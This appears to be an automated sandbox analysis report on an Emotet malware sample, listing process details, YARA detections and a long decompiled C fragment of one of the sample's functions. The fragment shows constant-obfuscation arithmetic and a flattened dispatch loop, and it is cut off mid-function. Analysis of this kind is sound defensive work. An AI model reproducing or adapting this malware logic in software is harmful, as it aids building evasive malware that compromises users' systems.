MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000008.00000002.868792580.0000000004CE0000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000008.00000002.868395885.0000000004820000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000008.00000002.868126623.0000000004090000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000008.00000002.869093007.00000000050C0000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000008.00000002.867289690.0000000000670000.00000040.00000010.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000008.00000002.868949205.0000000004EC0000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000008.00000002.868865834.0000000004DC0000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000008.00000002.868491768.0000000004980000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000008.00000002.869173450.0000000005140000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000008.00000002.868282805.0000000004620000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000008.00000002.868570789.00000000049E0000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000008.00000002.868675450.0000000004BC0000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 5732 Parent PID: 560

General

Start time:	20:11:45
Start date:	25/11/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff6b7590000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 7012 Parent PID: 560

General

Start time:	20:12:02
Start date:	25/11/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff6b7590000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 6080 Parent PID: 560

General

Start time:	20:12:17
Start date:	25/11/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff6b7590000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 5440 Parent PID: 560

General

Start time:	20:12:30
Start date:	25/11/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff6b7590000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: svchost.exe PID: 3180 Parent PID: 560

General

Start time:	20:12:56
Start date:	25/11/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase:	0x7ff6b7590000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: rundll32.exe PID: 5116 Parent PID: 3012 rundll32.exeCOMMON

Executed Functions

Function 0473FCD8, Relevance: 28.6, Strings: 22, Instructions: 1114
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E0473FCD8() {
				signed int _v16;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				char _v44;
				signed int _v56;
				signed int _v68;
				intOrPtr _v72;
				char _v76;
				signed int _v80;
				char _v88;
				char _v108;
				signed int _v116;
				signed int _v124;
				char _v128;
				char _v132;
				char _v136;
				char _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				unsigned int _v332;
				signed int _v336;
				signed int _v340;
				signed int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				unsigned int _v364;
				signed int _v368;
				signed int _v372;
				signed int _v376;
				signed int _v380;
				signed int _v384;
				signed int _v388;
				signed int _v392;
				signed int _v396;
				signed int _v400;
				signed int _v404;
				signed int _v408;
				signed int _v412;
				signed int _v416;
				signed int _v420;
				unsigned int _v424;
				signed int _v428;
				signed int _v432;
				signed int _v436;
				unsigned int _v440;
				signed int _v444;
				signed int _v448;
				signed int _v452;
				signed int _v456;
				signed int _v460;
				signed int _v464;
				signed int _v468;
				signed int _v472;
				signed int _v476;
				signed int _v480;
				signed int _v484;
				signed int _v488;
				signed int _v492;
				signed int _v496;
				unsigned int _v500;
				unsigned int _v504;
				signed int _v508;
				signed int _v512;
				signed int _v516;
				signed int _v520;
				signed int _v524;
				signed int _v528;
				signed int _v532;
				unsigned int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				signed int _v636;
				signed int _v640;
				unsigned int _v644;
				void* __ebx;
				signed int _t1179;
				void* _t1187;
				signed int _t1190;
				signed int _t1213;
				signed int _t1257;
				signed int _t1258;
				signed int _t1260;
				signed int _t1261;
				signed int _t1262;
				signed int _t1263;
				signed int _t1264;
				signed int _t1265;
				signed int _t1266;
				signed int _t1267;
				signed int _t1268;
				signed int _t1269;
				signed int _t1270;
				signed int _t1271;
				signed int _t1272;
				signed int _t1273;
				signed int _t1274;
				signed int _t1275;
				signed int _t1348;
				signed int _t1351;
				signed int _t1353;
				signed int _t1363;
				signed int _t1381;
				void* _t1383;
				void* _t1386;
				void* _t1387;
				void* _t1388;

				_t1383 = (_t1381 & 0xfffffff8) - 0x280;
				_v588 = 0x100b3b;
				_v588 = _v588 | 0xab6f67ba;
				_v588 = _v588 ^ 0x39b50c7b;
				_v588 = _v588 * 0x2f;
				_t1353 = 0x2dee833;
				_v588 = _v588 ^ 0xf3285142;
				_v264 = 0x6ca194;
				_v264 = _v264 >> 0xb;
				_v264 = _v264 ^ 0x00000d94;
				_v344 = 0x4e1f94;
				_t1260 = 0x1e;
				_v344 = _v344 / _t1260;
				_v344 = _v344 >> 0xb;
				_v344 = _v344 ^ 0x00000053;
				_v144 = 0xdbdb52;
				_v144 = _v144 | 0xaf5c6810;
				_v144 = _v144 ^ 0xafd1ada0;
				_v284 = 0x578fa5;
				_v284 = _v284 + 0xffffabe8;
				_v284 = _v284 ^ 0x005fa7bc;
				_v320 = 0x761a3e;
				_t1261 = 0x4d;
				_v320 = _v320 / _t1261;
				_t1348 = 0x4b;
				_v320 = _v320 / _t1348;
				_v320 = _v320 ^ 0x000d7b13;
				_v596 = 0x6ccab4;
				_v596 = _v596 + 0x4b58;
				_v596 = _v596 * 0x69;
				_v596 = _v596 * 0x22;
				_v596 = _v596 ^ 0xf134068b;
				_v516 = 0x92c4fd;
				_v516 = _v516 + 0x1dd7;
				_v516 = _v516 | 0x5aef6825;
				_t65 =  &_v516; // 0x5aef6825
				_v516 =  *_t65 * 0x50;
				_v516 = _v516 ^ 0x6ffc14d4;
				_v364 = 0xb24c27;
				_v364 = _v364 | 0x7e5a107e;
				_v364 = _v364 >> 0xf;
				_v364 = _v364 ^ 0x000c0d07;
				_v192 = 0xcefcf0;
				_v192 = _v192 ^ 0x60f7f054;
				_v192 = _v192 ^ 0x6033bc67;
				_v600 = 0x4b08e4;
				_v600 = _v600 + 0xffff709a;
				_v600 = _v600 + 0xffff1206;
				_v600 = _v600 << 0xc;
				_v600 = _v600 ^ 0x98b306a5;
				_v552 = 0x66e658;
				_v552 = _v552 + 0xc201;
				_v552 = _v552 | 0x7a92ebd7;
				_v552 = _v552 + 0xffffb191;
				_v552 = _v552 ^ 0x7af5fbe0;
				_v208 = 0xe5f5ef;
				_v208 = _v208 * 0x5d;
				_v208 = _v208 ^ 0x5380c904;
				_v544 = 0xce51a3;
				_v544 = _v544 + 0xffffd1ff;
				_v544 = _v544 << 4;
				_v544 = _v544 | 0x0552443a;
				_v544 = _v544 ^ 0x0df31436;
				_v536 = 0x30a532;
				_v536 = _v536 + 0x9d37;
				_v536 = _v536 ^ 0x03cfffdc;
				_v536 = _v536 >> 6;
				_v536 = _v536 ^ 0x00026f58;
				_v412 = 0x83ae2a;
				_v412 = _v412 + 0xdd06;
				_v412 = _v412 + 0xd25a;
				_v412 = _v412 ^ 0x00848409;
				_v520 = 0x1222b;
				_v520 = _v520 << 6;
				_v520 = _v520 + 0xb6d2;
				_v520 = _v520 + 0x9179;
				_v520 = _v520 ^ 0x00406460;
				_v528 = 0x5fae98;
				_v528 = _v528 + 0x89d9;
				_v528 = _v528 ^ 0x3ffbe121;
				_v528 = _v528 + 0xffff91c4;
				_v528 = _v528 ^ 0x3f93a52b;
				_v216 = 0x187e2b;
				_v216 = _v216 << 0xa;
				_v216 = _v216 ^ 0x61f267aa;
				_v420 = 0x3c9e26;
				_v420 = _v420 | 0xf61edc0d;
				_t1262 = 0x46;
				_v420 = _v420 / _t1262;
				_v420 = _v420 ^ 0x0388d77e;
				_v252 = 0xe5eadf;
				_v252 = _v252 + 0xffff160f;
				_v252 = _v252 ^ 0x00ee6d61;
				_v432 = 0xf3d01b;
				_v432 = _v432 + 0xffffd489;
				_v432 = _v432 << 4;
				_v432 = _v432 ^ 0x0f37b8f3;
				_v376 = 0xf867c9;
				_v376 = _v376 + 0xa17b;
				_t1263 = 0x34;
				_v376 = _v376 / _t1263;
				_v376 = _v376 ^ 0x000cb8d4;
				_v440 = 0x712fa8;
				_v440 = _v440 + 0x9fa3;
				_v440 = _v440 >> 6;
				_v440 = _v440 ^ 0x0008ce7e;
				_v608 = 0xf0f109;
				_v608 = _v608 >> 0x10;
				_v608 = _v608 | 0xc8ec7ec5;
				_v608 = _v608 ^ 0xc57e7b5f;
				_v608 = _v608 ^ 0x0d93872a;
				_v592 = 0x45580c;
				_v592 = _v592 + 0xffff5a11;
				_v592 = _v592 + 0xffff3ad4;
				_v592 = _v592 ^ 0xef98d37f;
				_v592 = _v592 ^ 0xefdc1852;
				_v584 = 0x9164fe;
				_t1257 = 0x29;
				_v584 = _v584 * 0x4d;
				_v584 = _v584 << 0xf;
				_v584 = _v584 * 0x7c;
				_v584 = _v584 ^ 0x58bddbd1;
				_v400 = 0x3279a5;
				_v400 = _v400 + 0x69c;
				_v400 = _v400 / _t1257;
				_v400 = _v400 ^ 0x00079678;
				_v308 = 0x4084f9;
				_v308 = _v308 << 6;
				_v308 = _v308 ^ 0x102c5183;
				_v152 = 0x59b15e;
				_t1264 = 0x51;
				_v152 = _v152 / _t1264;
				_v152 = _v152 ^ 0x000cebc2;
				_v340 = 0xce135d;
				_v340 = _v340 >> 3;
				_v340 = _v340 << 0xd;
				_v340 = _v340 ^ 0x38424f09;
				_v324 = 0x5de85c;
				_v324 = _v324 | 0x701d11f2;
				_v324 = _v324 << 0xf;
				_v324 = _v324 ^ 0xfcf3e771;
				_v488 = 0xcb768f;
				_v488 = _v488 >> 6;
				_v488 = _v488 ^ 0xe571a1b7;
				_v488 = _v488 | 0xd1381590;
				_v488 = _v488 ^ 0xf575d14d;
				_v336 = 0xc77629;
				_t1265 = 0x79;
				_v336 = _v336 * 0x32;
				_v336 = _v336 ^ 0x26fbf180;
				_v496 = 0x2ce426;
				_v496 = _v496 ^ 0x8ccf2c79;
				_v496 = _v496 + 0xde6b;
				_v496 = _v496 << 7;
				_v496 = _v496 ^ 0x725b6895;
				_v576 = 0xeafab4;
				_v576 = _v576 ^ 0x0d801f03;
				_v576 = _v576 / _t1348;
				_v576 = _v576 | 0x0a7b8915;
				_v576 = _v576 ^ 0x0a73acb2;
				_v304 = 0x465527;
				_t296 =  &_v304; // 0x465527
				_v304 =  *_t296 * 0x5c;
				_v304 = _v304 ^ 0x1945e173;
				_v604 = 0xb8bec6;
				_v604 = _v604 + 0x558b;
				_v604 = _v604 << 0xd;
				_v604 = _v604 | 0xbc7b6245;
				_v604 = _v604 ^ 0xbefdebd6;
				_v292 = 0x96cb04;
				_v292 = _v292 | 0x48047681;
				_v292 = _v292 ^ 0x48963c31;
				_v472 = 0x9191b1;
				_v472 = _v472 << 6;
				_v472 = _v472 * 0x25;
				_v472 = _v472 ^ 0x4283a88b;
				_v524 = 0x1da857;
				_v524 = _v524 / _t1265;
				_v524 = _v524 | 0x6c3f7080;
				_t1266 = 0x1d;
				_v524 = _v524 / _t1266;
				_v524 = _v524 ^ 0x03b169f1;
				_v168 = 0x471d91;
				_v168 = _v168 + 0x7524;
				_v168 = _v168 ^ 0x00455c5c;
				_v316 = 0x8524d8;
				_v316 = _v316 + 0xca6d;
				_t1267 = 0x43;
				_v316 = _v316 / _t1267;
				_v316 = _v316 ^ 0x00085ee7;
				_v556 = 0xd87f06;
				_v556 = _v556 | 0x6038dc14;
				_v556 = _v556 + 0xffffc268;
				_v556 = _v556 ^ 0x11ebb21b;
				_v556 = _v556 ^ 0x711e6221;
				_v628 = 0x6c3480;
				_t1268 = 0x1c;
				_v628 = _v628 / _t1268;
				_v628 = _v628 + 0xda64;
				_v628 = _v628 + 0xffffc3e5;
				_v628 = _v628 ^ 0x0006f463;
				_v392 = 0x4f2a20;
				_v392 = _v392 | 0xde3cf333;
				_v392 = _v392 << 0xf;
				_v392 = _v392 ^ 0xfd9bf2e5;
				_v212 = 0x871bd4;
				_v212 = _v212 + 0x1cce;
				_v212 = _v212 ^ 0x00825b4b;
				_v352 = 0x6ef4bc;
				_v352 = _v352 | 0x187a302e;
				_v352 = _v352 ^ 0xfb315a97;
				_v352 = _v352 ^ 0xe34e5a62;
				_v464 = 0x7aabea;
				_v464 = _v464 >> 0xd;
				_v464 = _v464 + 0x8f6e;
				_v464 = _v464 ^ 0x00045709;
				_v300 = 0x854a99;
				_v300 = _v300 >> 0xc;
				_v300 = _v300 ^ 0x0001bacc;
				_v492 = 0xf7a1b4;
				_v492 = _v492 >> 0xb;
				_v492 = _v492 + 0xf095;
				_v492 = _v492 + 0xffffbe55;
				_v492 = _v492 ^ 0x0008a33a;
				_v620 = 0xbf4383;
				_v620 = _v620 + 0x3ded;
				_t1269 = 9;
				_v620 = _v620 * 0x6d;
				_v620 = _v620 ^ 0xa9c8ee87;
				_v620 = _v620 ^ 0xf84f2de7;
				_v612 = 0xcc2c9a;
				_v612 = _v612 >> 3;
				_v612 = _v612 / _t1269;
				_v612 = _v612 ^ 0x982d0047;
				_v612 = _v612 ^ 0x9827a539;
				_v384 = 0x8f1e21;
				_v384 = _v384 | 0x1a3ff366;
				_v384 = _v384 ^ 0x94f4b037;
				_v384 = _v384 ^ 0x8e4f95a5;
				_v456 = 0x9ca168;
				_v456 = _v456 ^ 0x771401e1;
				_v456 = _v456 ^ 0x30d6c0f1;
				_v456 = _v456 ^ 0x475af2d4;
				_v160 = 0xe124a5;
				_t1270 = 0x5e;
				_v160 = _v160 / _t1270;
				_v160 = _v160 ^ 0x000c325b;
				_v236 = 0xfe2ba2;
				_v236 = _v236 * 0x7b;
				_v236 = _v236 ^ 0x7a1ba35e;
				_v172 = 0xd1963e;
				_v172 = _v172 + 0xffffb8b2;
				_v172 = _v172 ^ 0x00d55c68;
				_v228 = 0x37ef17;
				_v228 = _v228 | 0x8a4bcd58;
				_v228 = _v228 ^ 0x8a7f30e7;
				_v396 = 0xf822cd;
				_t1271 = 0x45;
				_v396 = _v396 * 0x79;
				_v396 = _v396 + 0xffffc53f;
				_v396 = _v396 ^ 0x754e03cf;
				_v404 = 0xae1804;
				_v404 = _v404 << 7;
				_v404 = _v404 / _t1271;
				_v404 = _v404 ^ 0x014d6507;
				_v372 = 0x8102ad;
				_v372 = _v372 << 0xc;
				_v372 = _v372 + 0xffff149e;
				_v372 = _v372 ^ 0x10271e05;
				_v200 = 0xfa93d8;
				_v200 = _v200 | 0x7c620f97;
				_v200 = _v200 ^ 0x7cf0c77f;
				_v380 = 0xdff8e5;
				_v380 = _v380 ^ 0x5bc766eb;
				_v380 = _v380 >> 0xf;
				_v380 = _v380 ^ 0x0006447a;
				_v388 = 0x2f250b;
				_v388 = _v388 ^ 0x15c92d68;
				_v388 = _v388 + 0x8a89;
				_v388 = _v388 ^ 0x15e533fe;
				_v296 = 0x13fcdc;
				_v296 = _v296 + 0xffff2295;
				_v296 = _v296 ^ 0x00155552;
				_v548 = 0xb53e44;
				_t1272 = 0x3c;
				_v548 = _v548 / _t1272;
				_t1273 = 0x6f;
				_v548 = _v548 / _t1273;
				_v548 = _v548 | 0xb7bc8a95;
				_v548 = _v548 ^ 0xb7bb9020;
				_v312 = 0xafde24;
				_v312 = _v312 + 0xffff1726;
				_v312 = _v312 ^ 0x00a42fed;
				_v288 = 0xebc435;
				_v288 = _v288 ^ 0x85769eff;
				_v288 = _v288 ^ 0x859936fd;
				_v224 = 0x82492d;
				_v224 = _v224 | 0x0d0ed809;
				_v224 = _v224 ^ 0x0d808b1a;
				_v232 = 0xc4a4d2;
				_v232 = _v232 >> 3;
				_v232 = _v232 ^ 0x001a55a3;
				_v240 = 0xdb63c4;
				_v240 = _v240 + 0xad7;
				_v240 = _v240 ^ 0x00da9581;
				_v560 = 0x2a6624;
				_v560 = _v560 >> 6;
				_v560 = _v560 << 2;
				_v560 = _v560 >> 0xd;
				_v560 = _v560 ^ 0x0006a0f4;
				_v348 = 0x2693a2;
				_v348 = _v348 | 0xf56eeb3f;
				_v348 = _v348 >> 0xf;
				_v348 = _v348 ^ 0x00035b37;
				_v184 = 0x8c8f01;
				_v184 = _v184 << 7;
				_v184 = _v184 ^ 0x464f542e;
				_v356 = 0x24ba4;
				_v356 = _v356 * 0x3a;
				_v356 = _v356 * 0x17;
				_v356 = _v356 ^ 0x0bf08f8d;
				_v632 = 0x7c4bf7;
				_v632 = _v632 | 0xe145ae99;
				_v632 = _v632 + 0xbc74;
				_t1274 = 0x56;
				_v632 = _v632 * 0x69;
				_v632 = _v632 ^ 0x7cf542ff;
				_v180 = 0x794f68;
				_t605 =  &_v180; // 0x794f68
				_v180 =  *_t605 / _t1257;
				_v180 = _v180 ^ 0x0000439e;
				_v244 = 0x9b3baf;
				_v244 = _v244 + 0xffffa8fa;
				_v244 = _v244 ^ 0x009205d5;
				_v624 = 0x42cbb3;
				_v624 = _v624 | 0xffffff9f;
				_v624 = _v624 ^ 0xffff8dc5;
				_v148 = 0x8fe08d;
				_v148 = _v148 + 0xffff302c;
				_v148 = _v148 ^ 0x008ae24d;
				_v268 = 0x516840;
				_v268 = _v268 ^ 0x4da4e91f;
				_v268 = _v268 ^ 0x4df63c42;
				_v196 = 0x348183;
				_v196 = _v196 + 0xffff2395;
				_v196 = _v196 ^ 0x0031fa63;
				_v508 = 0xda6612;
				_v508 = _v508 * 0x1b;
				_v508 = _v508 ^ 0xef2f888e;
				_v508 = _v508 + 0xffff6981;
				_v508 = _v508 ^ 0xf82294ce;
				_v572 = 0x2301b7;
				_v572 = _v572 << 0xa;
				_v572 = _v572 << 9;
				_v572 = _v572 / _t1274;
				_v572 = _v572 ^ 0x0026b5ef;
				_v644 = 0xb90f96;
				_v644 = _v644 + 0xde0e;
				_v644 = _v644 + 0xffff5fad;
				_v644 = _v644 >> 0x10;
				_v644 = _v644 ^ 0x000e8764;
				_v156 = 0x3e7a7f;
				_v156 = _v156 + 0xf6a3;
				_v156 = _v156 ^ 0x003c2565;
				_v476 = 0x659303;
				_v476 = _v476 << 0xe;
				_v476 = _v476 << 1;
				_v476 = _v476 ^ 0xc98899d8;
				_v272 = 0x785879;
				_v272 = _v272 >> 2;
				_v272 = _v272 ^ 0x00116a93;
				_v480 = 0x66b5b8;
				_v480 = _v480 | 0x3b4a7099;
				_v480 = _v480 + 0xfef;
				_v480 = _v480 ^ 0x3b6d9fae;
				_v280 = 0xf35682;
				_v280 = _v280 + 0xffffe6ac;
				_v280 = _v280 ^ 0x00f8e32a;
				_v256 = 0xbcc7f0;
				_v256 = _v256 | 0x7e4a1b2f;
				_v256 = _v256 ^ 0x7ef326b7;
				_v468 = 0xb2200;
				_v468 = _v468 + 0xffff72be;
				_v468 = _v468 + 0xcd9c;
				_v468 = _v468 ^ 0x00026554;
				_v568 = 0x3fe103;
				_v568 = _v568 << 6;
				_v568 = _v568 | 0x3a853c54;
				_v568 = _v568 + 0xbd3;
				_v568 = _v568 ^ 0x3ff7b744;
				_v444 = 0x28356b;
				_v444 = _v444 ^ 0x6060e51f;
				_v444 = _v444 | 0x0f7dec1f;
				_v444 = _v444 ^ 0x6f7f8a3e;
				_v532 = 0xcd661a;
				_v532 = _v532 + 0xffffd409;
				_v532 = _v532 + 0xfc98;
				_v532 = _v532 << 7;
				_v532 = _v532 ^ 0x6717ea56;
				_v580 = 0xb56437;
				_t1275 = 0x15;
				_v580 = _v580 * 0x15;
				_v580 = _v580 * 0x68;
				_v580 = _v580 * 0x5e;
				_v580 = _v580 ^ 0x3893bd98;
				_v276 = 0x407297;
				_v276 = _v276 ^ 0xdeafb236;
				_v276 = _v276 ^ 0xdee3b7b3;
				_v188 = 0xda0e77;
				_v188 = _v188 ^ 0xc2d53116;
				_v188 = _v188 ^ 0xc20fd5a9;
				_v260 = 0xbd1214;
				_v260 = _v260 << 9;
				_v260 = _v260 ^ 0x7a20f64e;
				_v408 = 0xc06fca;
				_v408 = _v408 >> 8;
				_v408 = _v408 << 0xb;
				_v408 = _v408 ^ 0x06091e8f;
				_v640 = 0x15f361;
				_v640 = _v640 >> 7;
				_v640 = _v640 + 0xffffde8c;
				_v640 = _v640 >> 0xd;
				_v640 = _v640 ^ 0x0000ed1a;
				_v452 = 0x937a65;
				_v452 = _v452 * 0x78;
				_v452 = _v452 | 0xe52525d1;
				_v452 = _v452 ^ 0xe52731be;
				_v164 = 0x4238d3;
				_v164 = _v164 + 0xffff87a6;
				_v164 = _v164 ^ 0x004cf001;
				_v636 = 0xb50766;
				_v636 = _v636 | 0xd0efff48;
				_v636 = _v636 + 0xffff33f4;
				_v636 = _v636 + 0xffff5cc3;
				_v636 = _v636 ^ 0xd0f7ff20;
				_v564 = 0x869305;
				_v564 = _v564 | 0x9257df85;
				_v564 = _v564 << 0xe;
				_v564 = _v564 >> 1;
				_v564 = _v564 ^ 0x7bf5a6ee;
				_v424 = 0x9e2748;
				_v424 = _v424 | 0xf2b4bd29;
				_v424 = _v424 >> 3;
				_v424 = _v424 ^ 0x1e568211;
				_v368 = 0xae88ce;
				_v368 = _v368 / _t1275;
				_v368 = _v368 + 0xffffa7ab;
				_v368 = _v368 ^ 0x00028e8a;
				_v540 = 0x57c46c;
				_v540 = _v540 ^ 0xcedf5ec9;
				_t1276 = 0x60;
				_v540 = _v540 / _t1276;
				_v540 = _v540 >> 0xc;
				_v540 = _v540 ^ 0x000c8e98;
				_v204 = 0x2eeb1;
				_v204 = _v204 + 0xffff7f8e;
				_v204 = _v204 ^ 0x000f40e2;
				_v500 = 0xfd83bd;
				_v500 = _v500 << 0xa;
				_v500 = _v500 ^ 0x3b48aa7e;
				_v500 = _v500 >> 9;
				_v500 = _v500 ^ 0x006e91be;
				_v332 = 0x259584;
				_v332 = _v332 >> 0xd;
				_v332 = _v332 >> 8;
				_v332 = _v332 ^ 0x00038c39;
				_v504 = 0xab59b7;
				_v504 = _v504 >> 0xe;
				_v504 = _v504 >> 3;
				_v504 = _v504 + 0xffff4397;
				_v504 = _v504 ^ 0xfffe62aa;
				_v176 = 0xcabb56;
				_v176 = _v176 ^ 0xc24ef75d;
				_v176 = _v176 ^ 0xc28dd32d;
				_v512 = 0x845462;
				_v512 = _v512 ^ 0xdd453157;
				_v512 = _v512 + 0xd1a3;
				_v512 = _v512 << 9;
				_v512 = _v512 ^ 0x846ec590;
				_v428 = 0xd2fa63;
				_v428 = _v428 + 0xcf4c;
				_v428 = _v428 + 0x6e6f;
				_v428 = _v428 ^ 0x01e05db4;
				_v448 = 0x74f51d;
				_t1258 = _v336;
				_v448 = _v448 * 0xa;
				_v448 = _v448 ^ 0xe1a50d5c;
				_v448 = _v448 ^ 0xe534b96e;
				_v616 = 0x582265;
				_v616 = _v616 << 9;
				_v616 = _v616 * 0x4f;
				_v616 = _v616 ^ 0x587c2808;
				_v616 = _v616 ^ 0x3d467e09;
				_v360 = 0xe71ae;
				_v360 = _v360 + 0x8370;
				_v360 = _v360 + 0xffffc689;
				_v360 = _v360 ^ 0x000eb407;
				_v220 = 0xddf4e8;
				_v220 = _v220 >> 0xc;
				_v220 = _v220 ^ 0x0000129f;
				_v416 = 0xbf871e;
				_v416 = _v416 * 0x37;
				_v416 = _v416 << 0xb;
				_v416 = _v416 ^ 0x30362ba0;
				_v460 = 0xfe90b2;
				_v460 = _v460 << 0xa;
				_v460 = _v460 << 0xe;
				_v460 = _v460 ^ 0xb20dbba0;
				_v328 = 0xce0934;
				_v328 = _v328 | 0xaa4f1963;
				_v328 = _v328 >> 3;
				_v328 = _v328 ^ 0x1557170e;
				_v484 = 0xfcea06;
				_v484 = _v484 + 0xffffc4a8;
				_v484 = _v484 + 0xb7b8;
				_v484 = _v484 ^ 0x00f39246;
				_v248 = 0xdab671;
				_v248 = _v248 + 0xff90;
				_v248 = _v248 ^ 0x00dbc331;
				_v436 = 0xe563fc;
				_v436 = _v436 ^ 0xb0974b9e;
				_v436 = _v436 >> 4;
				_v436 = _v436 ^ 0x0b07c8e6;
				goto L1;
				do {
					while(1) {
						L1:
						_t1386 = _t1353 - 0x7b75f67;
						if(_t1386 > 0) {
							break;
						}
						if(_t1386 == 0) {
							_t1179 = E04724410();
							__eflags = _t1179;
							if(__eflags == 0) {
								L95:
								return _t1179;
							}
							_t1353 = 0x86b14cd;
							continue;
						}
						_t1387 = _t1353 - 0x3adcb65;
						if(_t1387 > 0) {
							__eflags = _t1353 - 0x5c329c4;
							if(__eflags > 0) {
								__eflags = _t1353 - 0x5c8ca36;
								if(_t1353 == 0x5c8ca36) {
									E047243A9(_t1276);
									_t1258 = 0xe2308a8;
									_t1179 = E0473E813(_v220, _v360);
									_pop(_t1276);
									_t1351 = _t1179;
									L12:
									_t1353 = 0x5024f34;
									continue;
								}
								__eflags = _t1353 - 0x6b2ccf5;
								if(_t1353 == 0x6b2ccf5) {
									_t1187 = E0473A53C();
									_t1276 = _v180;
									_t1179 = E04726B58(_v180, _t1187, _v244,  &_v116, _v616, _v624,  &_v124, _v148);
									_t1383 = _t1383 + 0x18;
									asm("sbb esi, esi");
									_t1353 = ( ~_t1179 & 0xff105ccf) + 0x6b2ccf5;
									continue;
								}
								__eflags = _t1353 - 0x6c1f235;
								if(_t1353 == 0x6c1f235) {
									_t1179 = E04730610();
									_t1353 = 0x5955dd2;
									continue;
								}
								__eflags = _t1353 - 0x76d8e10;
								if(_t1353 != 0x76d8e10) {
									goto L110;
								}
								_t1276 = _v116;
								_t1179 = E0472CE30(_v116, _v188, _v260, _v408, _v640);
								_t1383 = _t1383 + 0xc;
								_t1353 = 0x291cb69;
								continue;
							}
							if(__eflags == 0) {
								_t1276 =  &_v116;
								_t1190 = E0473D2E6( &_v116, _v268, _v196,  &_v108, _v508, _v572);
								_t1383 = _t1383 + 0x10;
								__eflags = _t1190;
								if(_t1190 != 0) {
									_t1179 = _v80;
									__eflags = _t1179 - 8;
									if(__eflags != 0) {
										__eflags = _t1179;
										if(__eflags == 0) {
											L49:
											_t1353 = 0xb85b595;
											continue;
										}
										__eflags = _t1179 - 1;
										if(__eflags != 0) {
											L42:
											_t1353 = 0x76d8e10;
											continue;
										}
										goto L49;
									}
									_t1353 = 0x2a1ede3;
									continue;
								}
								_t1179 = E0473E813(_v328, _v416);
